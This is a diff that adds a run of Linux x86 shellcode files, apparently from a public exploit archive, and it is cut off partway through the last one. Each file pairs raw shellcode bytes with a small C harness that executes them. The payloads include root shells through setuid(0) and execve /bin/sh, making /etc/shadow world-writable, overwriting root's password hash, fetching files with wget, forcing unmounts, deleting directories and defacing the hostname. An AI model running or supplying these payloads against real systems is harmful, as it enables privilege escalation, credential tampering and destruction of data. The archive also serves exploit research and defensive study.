+                xorl  %eax,%eax
+                pushl %eax
+                pushw $0x462d
+                movl %esp,%esi
+                pushl %eax
+                pushl $0x73656c62
+                pushl $0x61747069
+                pushl $0x2f6e6962
+                pushl $0x732f2f2f
+                movl   %esp,%ebx
+                leal   0x10(%esp),%edx
+                pushl  %eax
+                pushl  %esi
+                pushl  %esp
+                movl   %esp,%ecx
+                movb   $0xb,%al
+                int    $0x80
+
+                WAIT:
+                movl %eax, %ebx
+                xorl %eax, %eax
+                xorl %ecx, %ecx
+                xorl %edx, %edx
+                movb $7, %al
+                int $0x80
+                ");
+
+}
--- a/shellcodes/linux_x86/43679.c
+++ b/shellcodes/linux_x86/43679.c
@ -0,0 +1,24 @@
+/* 29 byte-long setuid(0) + execve("/bin/sh",...) shellcode
+   by Marcin Ulikowski <elceef@itsec.pl> */
+ 
+#include <unistd.h>
+ 
+char shellcode[] =
+"\x31\xdb"             /* xor    %ebx,%ebx       */
+"\x8d\x43\x17"         /* lea    0x17(%ebx),%eax */
+"\xcd\x80"             /* int    $0x80           */
+"\x53"                 /* push   %ebx            */
+"\x68\x6e\x2f\x73\x68" /* push   $0x68732f6e     */
+"\x68\x2f\x2f\x62\x69" /* push   $0x69622f2f     */
+"\x89\xe3"             /* mov    %esp,%ebx       */
+"\x50"                 /* push   %eax            */
+"\x53"                 /* push   %ebx            */
+"\x89\xe1"             /* mov    %esp,%ecx       */
+"\x99"                 /* cltd                   */
+"\xb0\x0b"             /* mov    $0xb,%al        */
+"\xcd\x80";            /* int    $0x80           */
+ 
+int main(void) {
+  void(*f)()=(void*)shellcode;f();
+  return 0;
+}
--- a/shellcodes/linux_x86/43680.c
+++ b/shellcodes/linux_x86/43680.c
@ -0,0 +1,29 @@
+#include <stdio.h>
+#include <string.h>
+
+/*
+	by Magnefikko
+	24.04.2010
+	magnefikko@gmail.com
+	Promhyl Studies :: http://promhyl.oz.pl
+	Subgroup: #PRekambr
+	Name: 27 bytes setuid(0) ^ execve("/bin/sh", 0, 0) shellcode
+	Platform: Linux x86
+	
+	setuid(0);
+	execve("/bin/sh", 0, 0);	
+
+	gcc -Wl,-z,execstack filename.c
+
+	shellcode:
+
+\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80
+
+*/
+
+
+int main(){
+	char shell[] ="\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
+	printf("by Magnefikko\nmagnefikko@gmail.com\npromhyl.oz.pl\n\nstrlen(shell)= %d\n", strlen(shell));
+	(*(void (*)()) shell)();
+}
--- a/shellcodes/linux_x86/43681.c
+++ b/shellcodes/linux_x86/43681.c
@ -0,0 +1,35 @@
+/* 
+ * Title: linux/x86 setuid(0) + chmod("/etc/shadow", 0666) Shellcode 37 Bytes
+ * Type: Shellcode
+ * Author: antrhacks
+ * Platform: Linux X86
+*/
+
+/* ASSembly
+ 31 db                	xor    %ebx,%ebx
+ b0 17                	mov    $0x17,%al
+ cd 80                	int    $0x80
+ 31 c0                	xor    %eax,%eax
+ 50                   	push   %eax
+ 68 61 64 6f 77       	push   $0x776f6461
+ 68 63 2f 73 68       	push   $0x68732f63
+ 68 2f 2f 65 74       	push   $0x74652f2f
+ 89 e3                	mov    %esp,%ebx
+ 66 b9 b6 01          	mov    $0x1b6,%cx
+ b0 0f                	mov    $0xf,%al
+ cd 80                	int    $0x80
+ 40                   	inc    %eax
+ cd 80                	int    $0x80
+*/
+
+int main(){
+ char shell[] = "\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50"
+"\x68\x61\x64\x6f\x77\x68\x63\x2f\x73\x68"
+"\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\xb6\x01"
+"\xb0\x0f\xcd\x80\x40\xcd\x80";
+
+ printf("[*] Taille du ShellCode = %d\n", strlen(shell));
+ (*(void (*)()) shell)();
+ 
+ return 0;
+}
--- a/shellcodes/linux_x86/43684.c
+++ b/shellcodes/linux_x86/43684.c
@ -0,0 +1,45 @@
+/* 
+ | Title: Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 89 Bytes
+ | Description: replace root's password with hash of "agix" in MD5
+ | Type: Shellcode
+ | Author: agix
+ | Platform: Linux X86
+*/
+
+#include <stdio.h>
+
+char shellcode[] =
+"\x31\xC9"            		//xor ecx,ecx
+"\x51"              		//push ecx
+"\x68\x61\x64\x6F\x77"   	//push dword 0x776f6461
+"\x68\x63\x2F\x73\x68"      	//push dword 0x68732f63
+"\x68\x2F\x2F\x65\x74" 		//push dword 0x74652f2f
+"\x89\xE3"               	//mov ebx,esp
+"\x66\xB9\x91\x01"         	//mov cx,0x191
+"\x31\xC0"               	//xor eax,eax
+"\xB0\x05"               	//mov al,0x5
+"\xCD\x80"               	//int 0x80
+"\x89\xC3"               	//mov ebx,eax
+"\xEB\x12" 			//jmp short 0x34
+"\x59" 				//pop ecx
+"\x31\xC0"               	//xor eax,eax
+"\x31\xD2"               	//xor edx,edx
+"\xB2\x20"               	//mov dl,0x20
+"\xB0\xB5"               	//mov al,0xb5
+"\x31\xF6"               	//xor esi,esi
+"\x6A\x08"            		//push byte +0x8
+"\x5E"                 		//pop esi
+"\x31\xFF"               	//xor edi,edi
+"\xCD\x80"               	//int 0x80
+"\xE8\xE9\xFF\xFF\xFF"      	//call 0x22
+//db "IMMkmgi9$NuhPs1B8H5uz7kEOeKf2H1:"
+"\x49\x4D\x4D\x6B\x6D\x67\x69\x39"
+"\x24\x4E\x75\x68\x50\x73\x31\x42"
+"\x38\x48\x35\x75\x7A\x37\x6B\x45"
+"\x4F\x65\x4B\x66\x32\x48\x31\x3A";
+
+int main(int argc, char **argv) {
+        int *ret;
+        ret = (int *)&ret + 2;
+        (*ret) = (int) shellcode;
+}
--- a/shellcodes/linux_x86/43685.c
+++ b/shellcodes/linux_x86/43685.c
@ -0,0 +1,51 @@
+/*
+Title: 	 Linux x86 - Remote file Download - 42 bytes
+Author:	 Jonathan Salwan <submit AT shell-storm.org>
+Web:	 http://www.shell-storm.org
+Twitter: http://twitter.com/jonathansalwan
+
+
+!Database of Shellcodes http://www.shell-storm.org/shellcode/
+
+
+08048054 <.text>:
+ 8048054:	6a 0b                	push   $0xb
+ 8048056:	58                   	pop    %eax
+ 8048057:	99                   	cltd   
+ 8048058:	52                   	push   %edx
+ 8048059:	68 61 61 61 61       	push   $0x61616161
+ 804805e:	89 e1                	mov    %esp,%ecx
+ 8048060:	52                   	push   %edx
+ 8048061:	6a 74                	push   $0x74
+ 8048063:	68 2f 77 67 65       	push   $0x6567772f
+ 8048068:	68 2f 62 69 6e       	push   $0x6e69622f
+ 804806d:	68 2f 75 73 72       	push   $0x7273752f
+ 8048072:	89 e3                	mov    %esp,%ebx
+ 8048074:	52                   	push   %edx
+ 8048075:	51                   	push   %ecx
+ 8048076:	53                   	push   %ebx
+ 8048077:	89 e1                	mov    %esp,%ecx
+ 8048079:	cd 80                	int    $0x80
+ 804807b:	40                   	inc    %eax
+ 804807c:	cd 80                	int    $0x80
+*/
+
+#include <stdio.h>
+
+char sc[] = 	"\x6a\x0b\x58\x99\x52"
+		"\x68\x61\x61\x61\x61" // Change it
+		"\x89\xe1\x52\x6a\x74"
+		"\x68\x2f\x77\x67\x65"
+		"\x68\x2f\x62\x69\x6e"
+		"\x68\x2f\x75\x73\x72"
+		"\x89\xe3\x52\x51\x53"
+		"\x89\xe1\xcd\x80\x40"
+		"\xcd\x80";
+
+int main(void)
+{
+       	fprintf(stdout,"Length: %d\n",strlen(sc));
+	(*(void(*)()) sc)();
+     
+return 0;
+}
--- a/shellcodes/linux_x86/43686.c
+++ b/shellcodes/linux_x86/43686.c
@ -0,0 +1,44 @@
+/*
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1               #########################################              1
+0               I'm gunslinger_ member from Inj3ct0r Team              1
+1               #########################################              0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+Name   : 46 bytes cdrom ejecting x86 linux shellcode
+Date   : may, 31 2010
+Author : gunslinger_
+Web    : devilzc0de.com
+blog   : gunslingerc0de.wordpress.com
+tested on : ubuntu linux
+*/
+
+char sc[] = 	"\x6a\x0b\x58\x99\x52"
+		"\x6a\x6d\x68\x63\x64"
+		"\x72\x6f\x89\xe1\x52"
+		"\x66\x68\x63\x74\x68"
+		"\x2f\x65\x6a\x65\x68"
+		"\x2f\x62\x69\x6e\x68"
+		"\x2f\x75\x73\x72\x89"
+		"\xe3\x52\x51\x53\x89"
+		"\xe1\xcd\x80\x40\xcd"
+		"\x80";
+
+int main(void)
+{
+	(*(void(*)()) sc)();
+     
+return 0;
+}
--- a/shellcodes/linux_x86/43687.c
+++ b/shellcodes/linux_x86/43687.c
@ -0,0 +1,37 @@
+/*
+Title  : sethostname "pwned !!"
+Name   : 32 bytes sys_sethostname("PwNeD !!",8) x86 linux shellcode
+Date   : may, 31 2009
+Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
+Web    : devilzc0de.com
+blog   : gunslingerc0de.wordpress.com
+tested on : linux debian
+*/
+
+#include <stdio.h>
+
+char *shellcode=
+ "\xeb\x11"                    /* jmp    0x8048073 */
+ "\x31\xc0"                    /* xor    %eax,%eax */
+ "\xb0\x4a"                    /* mov    $0x4a,%al */
+ "\x5b"                        /* pop    %ebx */
+ "\xb1\x08"                    /* mov    $0x8,%cl */
+ "\xcd\x80"                    /* int    $0x80 */
+ "\x31\xc0"                    /* xor    %eax,%eax */
+ "\xb0\x01"                    /* mov    $0x1,%al */
+ "\x31\xdb"                    /* xor    %ebx,%ebx */
+ "\xcd\x80"                    /* int    $0x80 */
+ "\xe8\xea\xff\xff\xff"        /* call   0x8048062 */
+ "\x50"                        /* push   %eax */
+ "\x77\x4e"                    /* ja     0x80480c9 */
+ "\x65"                        /* gs */
+ "\x44"                        /* inc    %esp */
+ "\x20\x21"                    /* and    %ah,(%ecx) */
+ "\x21";                        /* .byte 0x21 */
+
+int main(void)
+{
+		fprintf(stdout,"Length: %d\n",strlen(shellcode));
+		((void (*)(void)) shellcode)();
+		return 0;
+}
--- a/shellcodes/linux_x86/43688.c
+++ b/shellcodes/linux_x86/43688.c
@ -0,0 +1,20 @@
+/*
+Name   : 8 bytes sys_exit(0) x86 linux shellcode
+Date   : may, 31 2010
+Author : gunslinger_
+Web    : devilzc0de.com
+blog   : gunslinger.devilzc0de.com
+tested on : linux debian
+*/
+
+char *bye=
+ "\x31\xc0"                    /* xor    %eax,%eax */
+ "\xb0\x01"                    /* mov    $0x1,%al */
+ "\x31\xdb"                    /* xor    %ebx,%ebx */
+ "\xcd\x80";                   /* int    $0x80 */
+
+int main(void)
+{
+		((void (*)(void)) bye)();
+		return 0;
+}
--- a/shellcodes/linux_x86/43689.c
+++ b/shellcodes/linux_x86/43689.c
@ -0,0 +1,33 @@
+/*
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+Name   : 6 bytes sys_sync x86 linux shellcode
+Date   : may, 31 2010
+Author : gunslinger_
+Web    : devilzc0de.com
+blog   : gunslingerc0de.wordpress.com
+tested on : ubuntu linux
+*/
+
+char *shellcode=
+ "\x31\xc0"                    /* xor    %eax,%eax */
+ "\xb0\x24"                    /* mov    $0x24,%al */
+ "\xcd\x80";                   /* int    $0x80 */
+
+int main(void)
+{
+		((void (*)(void)) shellcode)();
+		return 0;
+}
--- a/shellcodes/linux_x86/43690.c
+++ b/shellcodes/linux_x86/43690.c
@ -0,0 +1,38 @@
+/*
+Name   : 55 bytes sys_execve("/bin/sh", "-c", "ping localhost") x86 linux shellcode
+Date   : may, 31 2010
+Author : gunslinger_
+Web    : devilzc0de.com
+blog   : gunslinger.devilzc0de.com
+tested on : linux debian
+*/
+
+char asshole[] = "\x6a\x0b"             // push   $0xb
+		"\x58"                  // pop    %eax
+		"\x99"                  // cltd
+		"\x52"                  // push   %edx
+		"\x68\x73\x74\x20\x20"  // push   $0x20207473
+		"\x68\x61\x6c\x68\x6f"  // push   $0x6f686c61
+		"\x68\x20\x6c\x6f\x63"  // push   $0x636f6c20
+		"\x68\x70\x69\x6e\x67"  // push   $0x676e6970
+		"\x89\xe6"              // mov    %esp,%esi
+		"\x52"                  // push   %edx
+		"\x66\x68\x2d\x63"      // pushw  $0x632d
+		"\x89\xe1"              // mov    %esp,%ecx
+		"\x52"                  // push   %edx
+		"\x68\x2f\x2f\x73\x68"  // push   $0x68732f2f
+		"\x68\x2f\x62\x69\x6e"  // push   $0x6e69622f
+		"\x89\xe3"              // mov    %esp,%ebx
+		"\x52"                  // push   %edx
+		"\x56"                  // push   %esi
+		"\x51"                  // push   %ecx
+		"\x53"                  // push   %ebx
+		"\x89\xe1"              // mov    %esp,%ecx
+		"\xcd\x80";             // int    $0x80
+		
+int main(int argc, char **argv)
+{
+  int (*func)();
+  func = (int (*)()) asshole;
+  (int)(*func)();
+}
--- a/shellcodes/linux_x86/43691.c
+++ b/shellcodes/linux_x86/43691.c
@ -0,0 +1,57 @@
+/*
+Name   : 41 bytes sys_rmdir("/tmp/willdeleted") x86 linux shellcode
+Date   : may, 31 2010
+Author : gunslinger_
+Web    : devilzc0de.com
+blog   : gunslingerc0de.wordpress.com
+tested on : linux debian
+
+
+root@localhost:/home/gunslinger/shellcode# objdump -d rmdir
+
+rmdir:     file format elf32-i386
+
+Disassembly of section .text:
+
+08048060 <.text>:
+ 8048060:	eb 11                	jmp    0x8048073
+ 8048062:	31 c0                	xor    %eax,%eax
+ 8048064:	b0 28                	mov    $0x28,%al
+ 8048066:	31 db                	xor    %ebx,%ebx
+ 8048068:	5b                   	pop    %ebx
+ 8048069:	cd 80                	int    $0x80
+ 804806b:	31 c0                	xor    %eax,%eax
+ 804806d:	b0 01                	mov    $0x1,%al
+ 804806f:	31 db                	xor    %ebx,%ebx
+ 8048071:	cd 80                	int    $0x80
+ 8048073:	e8 ea ff ff ff       	call   0x8048062
+ 8048078:	2f                   	das    
+ 8048079:	74 6d                	je     0x80480e8
+ 804807b:	70 2f                	jo     0x80480ac
+ 804807d:	77 69                	ja     0x80480e8
+ 804807f:	6c                   	insb   (%dx),%es:(%edi)
+ 8048080:	6c                   	insb   (%dx),%es:(%edi)
+ 8048081:	64                   	fs
+ 8048082:	65                   	gs
+ 8048083:	6c                   	insb   (%dx),%es:(%edi)
+ 8048084:	65                   	gs
+ 8048085:	74 65                	je     0x80480ec
+ 8048087:	64                   	fs
+root@localhost:/home/gunslinger/shellcode#
+*/
+
+#include <stdio.h>
+
+char pussy[] =  "\xeb\x11\x31\xc0\xb0\x28\x31"
+		"\xdb\x5b\xcd\x80\x31\xc0\xb0"
+		"\x01\x31\xdb\xcd\x80\xe8\xea"
+		"\xff\xff\xff\x2f\x74\x6d\x70"
+		"\x2f\x77\x69\x6c\x6c\x64\x65"
+		"\x6c\x74\x65\x74\x65\x64";
+
+int main(void)
+{
+	(*(void(*)()) pussy)();
+     
+return 0;
+}
--- a/shellcodes/linux_x86/43692.c
+++ b/shellcodes/linux_x86/43692.c
@ -0,0 +1,60 @@
+/*
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+Title  : setdomainname to "th1s s3rv3r h4s b33n h1j4ck3d !!"
+Name   : 58 bytes sys_setdomainname ("th1s s3rv3r h4s b33n h1j4ck3d !!") x86 linux shellcode
+Date   : Wed Jun  2 19:57:34 2010
+Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
+Web    : http://devilzc0de.org
+blog   : http://gunslingerc0de.wordpress.com
+tested on : linux debian
+greetz to : flyff666, mywisdom, kiddies, petimati, ketek, whitehat, and all devilzc0de family 
+*/
+#include <stdio.h>
+
+char *shellcode=
+		"\xeb\x13"                    /* jmp    0x8048075 */
+		"\x31\xc0"                    /* xor    %eax,%eax */
+		"\xb0\x79"                    /* mov    $0x79,%al */
+		"\x5b"                        /* pop    %ebx */
+		"\x31\xc9"                    /* xor    %ecx,%ecx */
+		"\xb1\x20"                    /* mov    $0x20,%cl */
+		"\xcd\x80"                    /* int    $0x80 */
+		"\x31\xc0"                    /* xor    %eax,%eax */
+		"\xb0\x01"                    /* mov    $0x1,%al */
+		"\x31\xdb"                    /* xor    %ebx,%ebx */
+		"\xcd\x80"                    /* int    $0x80 */
+		"\xe8\xe8\xff\xff\xff"        /* call   0x8048062 */
+		"\x74\x68"                    /* je     0x80480e4 */
+		"\x31\x73\x20"                /* xor    %esi,0x20(%ebx) */
+		"\x73\x33"                    /* jae    0x80480b4 */
+		"\x72\x76"                    /* jb     0x80480f9 */
+		"\x33\x72\x20"                /* xor    0x20(%edx),%esi */
+		"\x68\x34\x73\x20\x62"        /* push   $0x62207334 */
+		"\x33\x33"                    /* xor    (%ebx),%esi */
+		"\x6e"                        /* outsb  %ds		"(%esi),(%dx) */
+		"\x20\x68\x31"                /* and    %ch,0x31(%eax) */
+		"\x6a\x34"                    /* push   $0x34 */
+		"\x63\x6b\x33"                /* arpl   %bp,0x33(%ebx) */
+		"\x64\x20\x21"                /* and    %ah,%fs		"(%ecx) */
+		"\x21";                        /* .byte 0x21 */
+
+int main(void)
+{
+		fprintf(stdout,"Length: %d\n",strlen(shellcode));
+		((void (*)(void)) shellcode)();
+		return 0;
+}
--- a/shellcodes/linux_x86/43694.c
+++ b/shellcodes/linux_x86/43694.c
@ -0,0 +1,70 @@
+/*
+
+################### Description ###################
+
+; Title   : Polymorphic execve /bin/sh - Shellcode
+; Author  : Hashim Jawad
+; Website : ihack4falafel[.]com
+; Twitter : @ihack4falafel
+; SLAE ID : SLAE-1115
+; Purpose : spawn /bin/sh shell
+; OS      : Linux
+; Arch    : x86
+; Size    : 26 bytes
+
+#################### sh.nasm ######################
+
+global _start
+
+section .text
+
+_start:
+	; zero out EAX
+	xor eax,eax
+	push eax
+
+	; push (/bin/sh) to the stack
+	mov edi, 0x343997B7
+	rol edi, 1
+	push edi
+	mov esi, 0xD2C45E5E
+	ror esi, 1
+	push esi
+
+	; ping kernel!
+	lea ebx, [esp]
+	mov al,0xb
+	int 0x80
+
+################### sh binary #####################
+
+nasm -f elf32 -o sh.o sh.nasm
+
+ld -z execstack -o sh sh.o
+
+##################  Shellcode #####################
+
+objdump -d sh -M intel
+
+###################  Compile  #####################
+
+gcc -fno-stack-protector -z execstack sh.c -o sh
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x31\xc0\x50\xbf\xb7\x97\x39\x34\xd1\xc7\x57\xbe\x5e\x5e\xc4\xd2\xd1\xce\x56\x8d\x1c\x24\xb0\x0b\xcd\x80";
+
+main()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
--- a/shellcodes/linux_x86/43695.c
+++ b/shellcodes/linux_x86/43695.c
@ -0,0 +1,50 @@
+/*
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+Title  : force unmount "/media/disk" x86 linux shellcode (some data cause lost)
+Name   : 33 bytes force unmount "/media/disk" linux x68 shellcode
+Date   : Fri Jun  4 13:15:51 2010
+Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
+Web    : http://devilzc0de.org
+blog   : http://gunslingerc0de.wordpress.com
+tested on : linux debian
+special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
+greetz to : flyff666, whitehat, ketek, chaer, peneter, and all devilzc0de crew
+*/
+#include <stdio.h>
+
+char *shellcode=
+		"\xeb\x0f"                    /* jmp    0x8048071 */
+		"\x31\xc0"                    /* xor    %eax,%eax */
+		"\xb0\x34"                    /* mov    $0x34,%al */
+		"\x5b"                        /* pop    %ebx */
+		"\xcd\x80"                    /* int    $0x80 */
+		"\x31\xc0"                    /* xor    %eax,%eax */
+		"\xb0\x01"                    /* mov    $0x1,%al */
+		"\x31\xdb"                    /* xor    %ebx,%ebx */
+		"\xcd\x80"                    /* int    $0x80 */
+		"\xe8\xec\xff\xff\xff"        /* call   0x8048062 */
+		"\x2f"                        /* das     */
+		"\x6d"                        /* insl   (%dx),%es:(%edi) */
+		"\x65\x64\x69\x61\x2f\x64\x69"/* imul $0x6b736964,%fs:%gs:0x2f(%ecx),%esp */
+		"\x73\x6b";
+
+int main(void)
+{
+		fprintf(stdout,"Length: %d\n",strlen(shellcode));
+		((void (*)(void)) shellcode)();
+		return 0;
+}
--- a/shellcodes/linux_x86/43696.c
+++ b/shellcodes/linux_x86/43696.c
@ -0,0 +1,29 @@
+  /*
+ | Title: Linux/x86 chmod(/etc/shadow, 0666) ASCII   Shellcode 443 Bytes
+
+ | Type: Shellcode
+ | Author: agix
+ | Platform: Linux X86
+*/
+
+#include <stdio.h>
+
+char shellcode[] =
+"LLLLhHEY!X5HEY!"
+"HZTYRRRPTURWa-5lmm-2QQQ-8AAAfhRRfZ0p>0x?fh88fZ0p?fh  "
+"fZ0pS0pH0p?fh55fZ0p@fhbbfZ0pA0pBfhyyfZ0pAfhwwfZ0pE0pB"
+"fhDDfZ0pCfhddfZ0pU0pDfhzzfZ0pW0pDfhuufZ0pEfhhhfZ0pJ0p"
+"FfhoofZ0pF0pMfhccfZ0pV0pGfhiifZ0pGfh//fZ0pL0pM0pHfhss"
+"fZ0pIfhmmfZ0pIfhaafZ0pJfhHHfZ0pKfhnnfZ0pLfheefZ0pR0pN"
+"0pOfhttfZ0pO0pN0xPfhVVfZ0pP0xQfh((fZ0pQfhPPfZ0pQfhfff"
+"Z0pRfhFFfZ0pS0xSfhIIfZ0pTfhssfZ0pT0xTfhOOfZ0pV0xVfh22"
+"fZ0pXfh  fZ0pX0xXfh@@fZ0pY0xY"
+
+"c'est quoi ma note de secu ?";
+
+
+int main(int argc, char **argv) {
+        int *ret;
+        ret = (int *)&ret + 2;
+        (*ret) = (int) shellcode;
+}
--- a/shellcodes/linux_x86/43697.c
+++ b/shellcodes/linux_x86/43697.c
@ -0,0 +1,36 @@
+/*
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+Name   : 74 bytes cdrom ejecting x86 linux polymorphic shellcode
+Date   : Sat Jun  17 17:29:00 2010
+Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
+Web    : http://devilzc0de.org
+blog   : http://gunslingerc0de.wordpress.com
+tested on : linux debian
+special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org),
+                    mywisdom (devilzc0de.org), loneferret (offensive-security.com)
+*/
+
+char ejectcd[] = "\xeb\x11\x5e\x31\xc9\xb1\x3e\x80\x6c\x0e\xff\x35\x80\xe9\x01"
+		 "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x9f\x40\x8d\xce\x87\x9f"
+		 "\xa2\x9d\x98\x99\xa7\xa4\xbe\x16\x87\x9b\x9d\x98\xa9\x9d\x64"
+		 "\x9a\x9f\x9a\x9d\x64\x97\x9e\xa3\x9d\x64\xaa\xa8\xa7\xbe\x18"
+		 "\x87\x86\x88\xbe\x16\x02\xb5\x75\x02\xb5";
+
+int main(void)
+{
+	(*(void(*)()) ejectcd)();
+}
--- a/shellcodes/linux_x86/43698.c
+++ b/shellcodes/linux_x86/43698.c
@ -0,0 +1,45 @@
+/*
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
